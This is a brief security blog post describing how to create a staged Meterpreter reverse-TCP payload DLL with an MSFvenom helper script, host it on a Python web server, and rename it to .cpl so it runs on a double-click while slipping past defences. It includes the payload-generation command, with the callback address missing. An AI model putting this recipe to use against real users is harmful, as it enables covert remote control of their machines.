Interesting .DLL,.CPL,EXE*

Interesting .DLL,.CPL,EXE*

I was looking around at folder tricks and how they could be re-purposed for evil, gotta sharpen my mind to be super nasty (honey badger like if you will) anyway I was on this site
I thought Hmm what's this .cpl file type business ... so I search my computer for one listed ...

It has the same icon as a .DLL, I wonder if it behaves like a .DLL

So, I jump on my Linux box and using g0tm1lk's MSF-Venom Payload Creator create a meterpreter dll that will as most of you can probably see, when executed connect back to on port 4433

./ dll 4433 msf reverse staged tcp


as you can see mpc even shows you how to make the payload accessible over the network via a simple Python web-server, so ... do that.

rename it from .dll to .cpl

You now have an executable meterpreter payload that will launch from a click, what's cool about this is that it IS a .dll but you cant doubleclick and launch it as a .dll yet, a .cpl file you can, this might only be useful for evasion in terms of it's an executable file extension that goes overlooked ... and i'll be looking for more

I didn't know about this technique until I was playing around

Video here

==Some other information on .cpl abuse ==

The TrendMicro piece is pretty good